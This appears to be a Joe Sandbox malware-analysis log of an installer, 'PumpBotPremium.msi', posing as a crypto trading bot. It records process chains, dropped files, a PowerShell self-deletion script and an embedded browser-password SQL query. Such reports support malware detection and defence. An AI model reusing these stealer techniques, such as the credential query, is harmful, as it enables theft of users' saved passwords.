Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.cazabon.com/pyCMS
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cs.hmc.edu/tr/hmc-cs-2014-0905.pdf
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.ibm.com/
Source: BlockchainConnector.exe, 00000007.00000003.1893352229.0000019A0D26A000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D279000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3663.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/copyMatAndDumpNamedArgumentsOOO
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.littlecms.com
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mathworks.com/help/techdoc/ref/rank.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.mia.uni-saarland.de/Publications/gwosdek-ssvm11.pdf
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openblas.net/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_VERIFY_PARAM_set_flags.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_verify_cert_error_string.html#ERROR-CODES
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.openssl.org/docs/manmaster/man5/
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.python.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1906987998.0000019A13FC0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/dev/peps/pep-0506/
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tensorflow.org/lite
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp String found in binary or memory: https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node4.html
Drops certificate files (DER)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6 Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to dropped file
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021BD60 GetForegroundWindow,MessageBoxW,GetCurrentProcess,OpenProcessToken,CloseHandle,GetLastError,ExitWindowsEx,CloseHandle, 3_2_0021BD60
Creates files inside the system directory
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5c7177.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B99.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BF7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C27.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C48.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C87.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CB7.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{26BCD435-D353-42A0-8C43-818FC0FA354F} Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7D93.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5c717a.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5c717a.msi Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8554.tmp Jump to behavior
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8CB8.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File created: C:\Windows\SystemTemp\AI_D021.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File created: C:\Windows\SystemTemp\AI_D021.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07A7CCFBD28A674D95D3BF853C9007C6 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6 Jump to behavior
Deletes files inside the Windows folder
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI7B99.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021A450 3_2_0021A450
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021B3F0 3_2_0021B3F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0024BFE0 3_2_0024BFE0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00286067 3_2_00286067
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00298099 3_2_00298099
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021E220 3_2_0021E220
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0026C330 3_2_0026C330
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028E34D 3_2_0028E34D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00282410 3_2_00282410
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0021E470 3_2_0021E470
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002766B0 3_2_002766B0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002116C0 3_2_002116C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002629E0 3_2_002629E0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0023CA10 3_2_0023CA10
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00276AB0 3_2_00276AB0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00266BA0 3_2_00266BA0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00276C60 3_2_00276C60
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00270CE0 3_2_00270CE0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00274E30 3_2_00274E30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00274F50 3_2_00274F50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00272F90 3_2_00272F90
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00273030 3_2_00273030
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002910D9 3_2_002910D9
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0028F26A 3_2_0028F26A
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00215410 3_2_00215410
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0023B650 3_2_0023B650
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00261680 3_2_00261680
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0023B760 3_2_0023B760
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00231920 3_2_00231920
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0023F960 3_2_0023F960
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0026D9F0 3_2_0026D9F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00277B30 3_2_00277B30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00285CD9 3_2_00285CD9
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd C438DD66FA669430CCE11B2ACB7DC0EE72B7953B07013FDA6BF6B803C2C961F9
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00215150 appears 64 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00214E80 appears 65 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 0027D250 appears 54 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: String function: 00213540 appears 50 times
PE file contains executable resources (Code or Archives)
Source: unicodedata.pyd.4.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file contains more sections than normal
Source: BlockchainConnector.exe.2.dr Static PE information: Number of sections : 12 > 10
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: Number of sections : 13 > 10
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: Number of sections : 19 > 10
Source: cv2.pyd.4.dr Static PE information: Number of sections : 15 > 10
Source: BlockchainConnector.exe.4.dr Static PE information: Number of sections : 12 > 10
PE file does not import any functions
Source: python3.dll.4.dr Static PE information: No import functions for PE file found
Source: qt5core.dll.4.dr Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317
Source: classification engine Classification label: mal92.troj.spyw.evad.winMSI@28/152@1/1
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_002373A0 FormatMessageW,GetLastError, 3_2_002373A0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00255AF0 GetDiskFreeSpaceExW, 3_2_00255AF0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0025E870 CoCreateInstance, 3_2_0025E870
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00230620 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 3_2_00230620
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Coinsw.app Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF47F5555B91963625.TMP Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe File read: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Key opened: HKEY_USERSS-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
Source: PumpBotPremium.msi ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PumpBotPremium.msi"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1 Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe "C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
